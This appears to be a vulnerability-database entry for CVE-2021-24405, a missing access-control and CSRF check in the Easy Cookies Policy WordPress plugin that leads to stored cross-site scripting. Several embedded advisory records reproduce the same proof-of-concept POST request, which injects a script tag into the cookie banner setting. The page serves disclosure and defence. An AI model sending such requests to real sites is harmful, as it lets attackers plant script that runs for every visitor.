Description
The Easy Cookies Policy WordPress plugin through 1.6.2 performs neither a capability check nor a CSRF check when saving its settings, allowing any authenticated user (such as a subscriber) to change them. If users can't register, the same change can still be made through CSRF, i.e. by a forged request sent from the browser of a user who is already logged in. Furthermore, the cookie banner setting is not sanitised or validated before being output on all frontend pages and on the backend settings page, leading to a Stored Cross-Site Scripting issue.
Affected Software
Related
{"id": "CVE-2021-24405", "vendorId": null, "type": "cve", "bulletinFamily": "NVD", "title": "CVE-2021-24405", "description": "The Easy Cookies Policy WordPress plugin through 1.6.2 is lacking any capability and CSRF check when saving its settings, allowing any authenticated users (such as subscriber) to change them. If users can't register, this can be done through CSRF. Furthermore, the cookie banner setting is not sanitised or validated before being output in all pages of the frontend and the backend settings one, leading to a Stored Cross-Site Scripting issue.", "published": "2021-07-06T11:15:00", "modified": "2022-06-16T19:30:00", "cvss": {"score": 4.0, "vector": "AV:N/AC:L/Au:S/C:N/I:P/A:N"}, "cvss2": {"cvssV2": {"version": "2.0", "vectorString": "AV:N/AC:L/Au:S/C:N/I:P/A:N", "accessVector": "NETWORK", "accessComplexity": "LOW", "authentication": "SINGLE", "confidentialityImpact": "NONE", "integrityImpact": "PARTIAL", "availabilityImpact": "NONE", "baseScore": 4.0}, "severity": "MEDIUM", "exploitabilityScore": 8.0, "impactScore": 2.9, "acInsufInfo": false, "obtainAllPrivilege": false, "obtainUserPrivilege": false, "obtainOtherPrivilege": false, "userInteractionRequired": false}, "cvss3": {"cvssV3": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:H/A:N", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "HIGH", "availabilityImpact": "NONE", "baseScore": 6.5, "baseSeverity": "MEDIUM"}, "exploitabilityScore": 2.8, "impactScore": 3.6}, "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2021-24405", "reporter": "contact@wpscan.com", "references": ["https://wpscan.com/vulnerability/9157d6d2-4bda-4fcd-8192-363a63a51ff5", "http://packetstormsecurity.com/files/166543/WordPress-Easy-Cookie-Policy-1.6.2-Cross-Site-Scripting.html"], "cvelist": ["CVE-2021-24405"], "immutableFields": [], "lastseen": 
"2022-06-17T16:31:58", "viewCount": 23, "enchantments": {"dependencies": {"references": [{"type": "wpexploit", "idList": ["WPEX-ID:9157D6D2-4BDA-4FCD-8192-363A63A51FF5"]}, {"type": "wpvulndb", "idList": ["WPVDB-ID:9157D6D2-4BDA-4FCD-8192-363A63A51FF5"]}], "rev": 4}, "score": {"value": 2.0, "vector": "NONE"}, "twitter": {"counter": 3, "tweets": [{"link": "https://twitter.com/threatintelctr/status/1413521049640124422", "text": " NEW: CVE-2021-24405 The Easy Cookies Policy WordPress plugin through 1.6.2 is lacking any capability and CSRF check when saving its settings, allowing any authenticated users (such as subscriber) to change them... (click for more) Severity: MEDIUM https://t.co/hrX8ihB617?amp=1"}, {"link": "https://twitter.com/threatintelctr/status/1537521208492695553", "text": " NEW: CVE-2021-24405 The Easy Cookies Policy WordPress plugin through 1.6.2 is lacking any capability and CSRF check when saving its settings, allowing any authenticated users (such as subscriber) to change them... 
(click for more) Severity: MEDIUM https://t.co/hrX8ihB617", "author": "threatintelctr", "author_photo": "https://pbs.twimg.com/profile_images/904224973987840000/dMy1x9Ho_400x400.jpg"}]}, "backreferences": {"references": [{"type": "wpexploit", "idList": ["WPEX-ID:9157D6D2-4BDA-4FCD-8192-363A63A51FF5"]}, {"type": "wpvulndb", "idList": ["WPVDB-ID:9157D6D2-4BDA-4FCD-8192-363A63A51FF5"]}]}, "exploitation": null, "vulnersScore": 2.0}, "_state": {"dependencies": 0, "twitter": 0}, "_internal": {}, "cna_cvss": {"cna": null, "cvss": {}}, "cpe": ["cpe:/a:izsoft:easy_cookies_policy:1.6.2"], "cpe23": ["cpe:2.3:a:izsoft:easy_cookies_policy:1.6.2:*:*:*:*:wordpress:*:*"], "cwe": ["CWE-863"], "affectedSoftware": [{"cpeName": "izsoft:easy_cookies_policy", "version": "1.6.2", "operator": "le", "name": "izsoft easy cookies policy"}], "affectedConfiguration": [], "cpeConfiguration": {"CVE_data_version": "4.0", "nodes": [{"operator": "OR", "children": [], "cpe_match": [{"vulnerable": true, "cpe23Uri": "cpe:2.3:a:izsoft:easy_cookies_policy:1.6.2:*:*:*:*:wordpress:*:*", "versionEndIncluding": "1.6.2", "cpe_name": []}]}]}, "extraReferences": [{"url": "https://wpscan.com/vulnerability/9157d6d2-4bda-4fcd-8192-363a63a51ff5", "name": "https://wpscan.com/vulnerability/9157d6d2-4bda-4fcd-8192-363a63a51ff5", "refsource": "CONFIRM", "tags": ["Exploit", "Third Party Advisory"]}, {"url": "http://packetstormsecurity.com/files/166543/WordPress-Easy-Cookie-Policy-1.6.2-Cross-Site-Scripting.html", "name": "http://packetstormsecurity.com/files/166543/WordPress-Easy-Cookie-Policy-1.6.2-Cross-Site-Scripting.html", "refsource": "MISC", "tags": ["Exploit", "Third Party Advisory", "VDB Entry"]}]}
{"zdt": [{"lastseen": "2022-03-30T07:49:08", "description": "", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "MEDIUM", "confidentialityImpact": "NONE", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "baseScore": 6.5, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:H/A:N", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 3.6}, "published": "2022-03-30T00:00:00", "type": "zdt", "title": "WordPress Easy Cookie Policy 1.6.2 Plugin - Broken Access Control to Stored XSS Vulnerability", "bulletinFamily": "exploit", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "NONE", "availabilityImpact": "NONE", "integrityImpact": "PARTIAL", "baseScore": 4.0, "vectorString": "AV:N/AC:L/Au:S/C:N/I:P/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "impactScore": 2.9, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-24405"], "modified": "2022-03-30T00:00:00", "id": "1337DAY-ID-37546", "href": "https://0day.today/exploit/description/37546", "sourceData": "# Exploit Title: WordPress Plugin Easy Cookie Policy 1.6.2 - Broken Access Control to Stored XSS\n# Author: 0xB9\n# Software Link: https://wordpress.org/plugins/easy-cookies-policy/\n# Version: 1.6.2\n# Tested on: Windows 10\n# CVE: CVE-2021-24405\n\n1. Description:\nBroken access control allows any authenticated user to change the cookie banner through a POST request to admin-ajax.php.\nIf users can't register, this can be done through CSRF.\n\n2. 
Proof of Concept:\nPOST http://localhost/wp-admin/admin-ajax.php HTTP/1.1\nUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:86.0) Gecko/20100101 Firefox/86.0\nAccept: application/json, text/javascript, /; q=0.01\nAccept-Language: en-US,en;q=0.5\nReferer: http://localhost/wp-admin/options-general.php?page=easy-cookies-policy\nContent-Type: application/x-www-form-urlencoded; charset=UTF-8\nX-Requested-With: XMLHttpRequest\nContent-Length: 226\nOrigin: http://localhost\nConnection: keep-alive\nHost: localhost\nCookie: [Any authenticated user]\n\naction=easy_cookies_policy_save_settings&maintext=<script>alert(1)</script>&background=black&transparency=90&close=accept&expires=365&enabled=true&display=fixed&position=top&button_text=Accept&text_color=#dddddd\n", "sourceHref": "https://0day.today/exploit/37546", "cvss": {"score": 4.0, "vector": "AV:N/AC:L/Au:S/C:N/I:P/A:N"}}], "packetstorm": [{"lastseen": "2022-03-30T15:13:30", "description": "", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "MEDIUM", "confidentialityImpact": "NONE", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "baseScore": 6.5, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:H/A:N", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 3.6}, "published": "2022-03-30T00:00:00", "type": "packetstorm", "title": "WordPress Easy Cookie Policy 1.6.2 Cross Site Scripting", "bulletinFamily": "exploit", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "NONE", "availabilityImpact": "NONE", "integrityImpact": "PARTIAL", "baseScore": 4.0, "vectorString": "AV:N/AC:L/Au:S/C:N/I:P/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "impactScore": 2.9, "acInsufInfo": false, 
"obtainUserPrivilege": false}, "cvelist": ["CVE-2021-24405"], "modified": "2022-03-30T00:00:00", "id": "PACKETSTORM:166543", "href": "https://packetstormsecurity.com/files/166543/WordPress-Easy-Cookie-Policy-1.6.2-Cross-Site-Scripting.html", "sourceData": "`# Exploit Title: WordPress Plugin Easy Cookie Policy 1.6.2 - Broken Access Control to Stored XSS \n# Date: 2/27/2021 \n# Author: 0xB9 \n# Software Link: https://wordpress.org/plugins/easy-cookies-policy/ \n# Version: 1.6.2 \n# Tested on: Windows 10 \n# CVE: CVE-2021-24405 \n \n1. Description: \nBroken access control allows any authenticated user to change the cookie banner through a POST request to admin-ajax.php. \nIf users can't register, this can be done through CSRF. \n \n2. Proof of Concept: \nPOST http://localhost/wp-admin/admin-ajax.php HTTP/1.1 \nUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:86.0) Gecko/20100101 Firefox/86.0 \nAccept: application/json, text/javascript, /; q=0.01 \nAccept-Language: en-US,en;q=0.5 \nReferer: http://localhost/wp-admin/options-general.php?page=easy-cookies-policy \nContent-Type: application/x-www-form-urlencoded; charset=UTF-8 \nX-Requested-With: XMLHttpRequest \nContent-Length: 226 \nOrigin: http://localhost \nConnection: keep-alive \nHost: localhost \nCookie: [Any authenticated user] \n \naction=easy_cookies_policy_save_settings&maintext=<script>alert(1)</script>&background=black&transparency=90&close=accept&expires=365&enabled=true&display=fixed&position=top&button_text=Accept&text_color=#dddddd \n \n`\n", "cvss": {"score": 4.0, "vector": "AV:N/AC:L/Au:S/C:N/I:P/A:N"}, "sourceHref": "https://packetstormsecurity.com/files/download/166543/wpecp162-xss.txt"}], "wpvulndb": [{"lastseen": "2021-09-14T23:15:46", "description": "The plugin is lacking any capability and CSRF check when saving it's settings, allowing any authenticated users (such as subscriber) to change them. If users can't register, this can be done through CSRF. 
Furthermore, the cookie banner setting is not sanitised or validated before being output in all pages of the frontend and the backend settings one, leading to a Stored Cross-Site Scripting issue.\n\n### PoC\n\nPOST /wp-admin/admin-ajax.php HTTP/1.1 Accept: application/json, text/javascript, /; q=0.01 Accept-Language: en-US,en;q=0.5 Content-Type: application/x-www-form-urlencoded; charset=UTF-8 X-Requested-With: XMLHttpRequest Content-Length: 226 Connection: keep-alive Cookie: [Any authenticated user / via CSRF] action=easy_cookies_policy_save_settings&maintext;=&background;=black&transparency;=90&close;=accept&expires;=365&enabled;=true&display;=fixed&position;=top&button;_text=Accept&text;_color=#dddddd\n", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "MEDIUM", "confidentialityImpact": "NONE", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "HIGH", "baseScore": 6.5, "privilegesRequired": "LOW", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:H/A:N", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 3.6}, "published": "2021-06-11T00:00:00", "type": "wpvulndb", "title": "Easy Cookie Policy <= 1.6.2 - Broken Access Control to Stored Cross-Site Scripting", "bulletinFamily": "software", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "NONE", "availabilityImpact": "NONE", "integrityImpact": "PARTIAL", "baseScore": 4.0, "vectorString": "AV:N/AC:L/Au:S/C:N/I:P/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "acInsufInfo": false, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-24405"], "modified": "2021-06-25T07:10:33", "id": "WPVDB-ID:9157D6D2-4BDA-4FCD-8192-363A63A51FF5", "href": 
"https://wpscan.com/vulnerability/9157d6d2-4bda-4fcd-8192-363a63a51ff5", "sourceData": "", "cvss": {"score": 4.0, "vector": "AV:N/AC:L/Au:S/C:N/I:P/A:N"}}], "wpexploit": [{"lastseen": "2021-09-14T23:15:46", "description": "The plugin is lacking any capability and CSRF check when saving it's settings, allowing any authenticated users (such as subscriber) to change them. If users can't register, this can be done through CSRF. Furthermore, the cookie banner setting is not sanitised or validated before being output in all pages of the frontend and the backend settings one, leading to a Stored Cross-Site Scripting issue.\n", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "MEDIUM", "confidentialityImpact": "NONE", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "HIGH", "baseScore": 6.5, "privilegesRequired": "LOW", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:H/A:N", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 3.6}, "published": "2021-06-11T00:00:00", "type": "wpexploit", "title": "Easy Cookie Policy <= 1.6.2 - Broken Access Control to Stored Cross-Site Scripting", "bulletinFamily": "exploit", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "NONE", "availabilityImpact": "NONE", "integrityImpact": "PARTIAL", "baseScore": 4.0, "vectorString": "AV:N/AC:L/Au:S/C:N/I:P/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "acInsufInfo": false, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-24405"], "modified": "2021-06-25T07:10:33", "id": "WPEX-ID:9157D6D2-4BDA-4FCD-8192-363A63A51FF5", "href": "", "sourceData": "POST /wp-admin/admin-ajax.php HTTP/1.1\r\nAccept: application/json, text/javascript, /; q=0.01\r\nAccept-Language: 
en-US,en;q=0.5\r\nContent-Type: application/x-www-form-urlencoded; charset=UTF-8\r\nX-Requested-With: XMLHttpRequest\r\nContent-Length: 226\r\nConnection: keep-alive\r\nCookie: [Any authenticated user / via CSRF]\r\n\r\naction=easy_cookies_policy_save_settings&maintext=<script>alert(1)</script>&background=black&transparency=90&close=accept&expires=365&enabled=true&display=fixed&position=top&button_text=Accept&text_color=#dddddd", "cvss": {"score": 4.0, "vector": "AV:N/AC:L/Au:S/C:N/I:P/A:N"}}], "patchstack": [{"lastseen": "2022-06-01T19:31:58", "description": "Broken Access Control vulnerability leading to Stored Cross-Site Scripting (XSS) discovered by 0xB9 in WordPress Easy Cookies Policy plugin (versions <= 1.6.2).\n\n## Solution\n\n\r\n This plugin has been closed as of April 28, 2021 and is not available for download. This closure is temporary, pending a full review.\r\n ", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "MEDIUM", "confidentialityImpact": "NONE", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "baseScore": 6.5, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:H/A:N", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 3.6}, "published": "2021-06-11T00:00:00", "type": "patchstack", "title": "WordPress Easy Cookies Policy plugin <= 1.6.2 - Broken Access Control vulnerability leading to Stored Cross-Site Scripting (XSS)", "bulletinFamily": "software", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "NONE", "availabilityImpact": "NONE", "integrityImpact": "PARTIAL", "baseScore": 4.0, "vectorString": "AV:N/AC:L/Au:S/C:N/I:P/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "impactScore": 2.9, "acInsufInfo": 
false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-24405"], "modified": "2021-06-11T00:00:00", "id": "PATCHSTACK:18DF57CE08A5AF8EE1A759956DD2DDD5", "href": "https://patchstack.com/database/vulnerability/easy-cookies-policy/wordpress-easy-cookies-policy-plugin-1-6-2-broken-access-control-vulnerability-leading-to-stored-cross-site-scripting-xss", "cvss": {"score": 4.0, "vector": "AV:N/AC:L/Au:S/C:N/I:P/A:N"}}], "exploitdb": [{"lastseen": "2022-03-30T09:29:12", "description": "", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "MEDIUM", "confidentialityImpact": "NONE", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "baseScore": 6.5, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:H/A:N", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 3.6}, "published": "2022-03-30T00:00:00", "type": "exploitdb", "title": "WordPress Plugin Easy Cookie Policy 1.6.2 - Broken Access Control to Stored XSS", "bulletinFamily": "exploit", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "NONE", "availabilityImpact": "NONE", "integrityImpact": "PARTIAL", "baseScore": 4.0, "vectorString": "AV:N/AC:L/Au:S/C:N/I:P/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "impactScore": 2.9, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["2021-24405", "CVE-2021-24405"], "modified": "2022-03-30T00:00:00", "id": "EDB-ID:50849", "href": "https://www.exploit-db.com/exploits/50849", "sourceData": "# Exploit Title: WordPress Plugin Easy Cookie Policy 1.6.2 - Broken Access Control to Stored XSS\r\n# Date: 2/27/2021\r\n# Author: 0xB9\r\n# Software Link: https://wordpress.org/plugins/easy-cookies-policy/\r\n# Version: 1.6.2\r\n# Tested on: 
Windows 10\r\n# CVE: CVE-2021-24405\r\n\r\n1. Description:\r\nBroken access control allows any authenticated user to change the cookie banner through a POST request to admin-ajax.php.\r\nIf users can't register, this can be done through CSRF.\r\n\r\n2. Proof of Concept:\r\nPOST http://localhost/wp-admin/admin-ajax.php HTTP/1.1\r\nUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:86.0) Gecko/20100101 Firefox/86.0\r\nAccept: application/json, text/javascript, /; q=0.01\r\nAccept-Language: en-US,en;q=0.5\r\nReferer: http://localhost/wp-admin/options-general.php?page=easy-cookies-policy\r\nContent-Type: application/x-www-form-urlencoded; charset=UTF-8\r\nX-Requested-With: XMLHttpRequest\r\nContent-Length: 226\r\nOrigin: http://localhost\r\nConnection: keep-alive\r\nHost: localhost\r\nCookie: [Any authenticated user]\r\n\r\naction=easy_cookies_policy_save_settings&maintext=<script>alert(1)</script>&background=black&transparency=90&close=accept&expires=365&enabled=true&display=fixed&position=top&button_text=Accept&text_color=#dddddd", "sourceHref": "https://www.exploit-db.com/download/50849", "cvss": {"score": 4.0, "vector": "AV:N/AC:L/Au:S/C:N/I:P/A:N"}}]}